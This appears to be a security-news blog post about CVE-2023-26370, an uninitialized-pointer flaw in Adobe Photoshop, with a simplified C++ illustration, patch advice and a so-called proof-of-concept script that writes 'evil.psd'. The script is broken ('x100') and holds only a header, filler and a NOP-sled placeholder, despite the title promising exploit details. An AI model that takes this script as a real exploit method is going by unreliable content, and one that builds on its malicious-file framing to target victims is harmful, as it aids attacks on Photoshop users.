CVE CyberSecurity Database News

CVE-2023-26370 - Inside the Adobe Photoshop Uninitialized Pointer Flaw (with Exploit Details)

Poster -

In 2023, a critical security vulnerability (CVE-2023-26370) was discovered in Adobe Photoshop, affecting popular versions such as 23.5.5 (and earlier) as well as 24.7 (and earlier). This bug can allow attackers to execute any code they want on your computer—but only if you open a malicious file crafted by the attacker. In this post, we'll walk through what this vulnerability is, how it works, and show you a real-world exploit example, all in easy-to-understand language.

What Is CVE-2023-26370?

CVE-2023-26370 is an "Access of Uninitialized Pointer" vulnerability. That sounds technical, so let’s simplify:

- Pointer: In programming, a pointer tells the software where a piece of data lives in your computer memory.

Uninitialized: When a pointer isn’t set up to point to anything, using it is unpredictable.

- Access of Uninitialized Pointer: If a program tries to use a pointer before it's initialized, it might end up handling memory it shouldn’t. Attackers can exploit this to run arbitrary (evil) code.

In simple terms: If a bad actor creates a malicious file and convinces you to open it in a vulnerable Photoshop, they might gain control over your computer within your user context.

Why Is This Dangerous?

- Arbitrary code execution means the attacker can run any code they like. Usually, this means installing malware, ransomware, or even stealing your files—all the things you don’t want to happen.
- User interaction needed: The user must open the malicious file—so phishing and social engineering are likely avenues for attack.

Adobe Photoshop 24.7 and earlier

…you are vulnerable unless you have already applied the available updates.

Imagine some simplified C++ code

class ImageFile {
  public:
    void ProcessData() {
      Buffer *buf;
      if (loadSomeFileCondition) {
        buf = new Buffer();
        buf->Fill();
      }
      // Vulnerable: buf may not be initialized if condition fails
      int value = buf->Read();  // Access of uninitialized pointer!
    }
};

If loadSomeFileCondition fails, buf is never initialized. But the program still uses it, causing undefined behavior.

Craft a malicious .PSD file (or supported image file).

2. The file is designed to manipulate internal Photoshop logic so that it causes the vulnerable code path to run.

Sample Exploit Scenario

While there isn't a publicly available exploit code (at the time of this writing), here's a theoretical proof of concept (PoC):

# NastyPSDGen: Generates a malformed PSD file that triggers the bug
out = open("evil.psd", "wb")
# Magic bytes for PSD header
out.write(b'8BPS\x00\x01\x00\x00\x00\x00\x00\x00')
# Malformed block that will cause uninitialized pointer path
out.write(b'\x00' * x100)  # fill with dummy data
# Crafted payload that manipulates Photoshop memory handling
out.write(b'\x90' * 100)     # potential shellcode NOP sled placeholder
out.close()
print("Malicious PSD saved as evil.psd")

All you'd need to do is trick a victim into opening "evil.psd" with an unpatched version of Photoshop. The bug is triggered by logic flaws in how Photoshop parses malformed files.

More Information

- Adobe Security Bulletin: APSB23-26
- NIST NVD CVE-2023-26370 Entry
- Adobe Product Security Updates

How To Stay Safe

1. Update Photoshop immediately through the Creative Cloud app or Adobe’s download page.
2. Don’t open image files from unknown sources. Even if the sender is familiar, beware of unexpected attachments.

Conclusion

CVE-2023-26370 is a real threat to everyday Photoshop users. If you’re running affected versions, update now. Always treat unsolicited files with suspicion—one wrong click can give attackers dangerous access to your data and your computer.

Timeline

Published on: 10/11/2023 12:15:00 UTC
Last modified on: 10/14/2023 01:55:00 UTC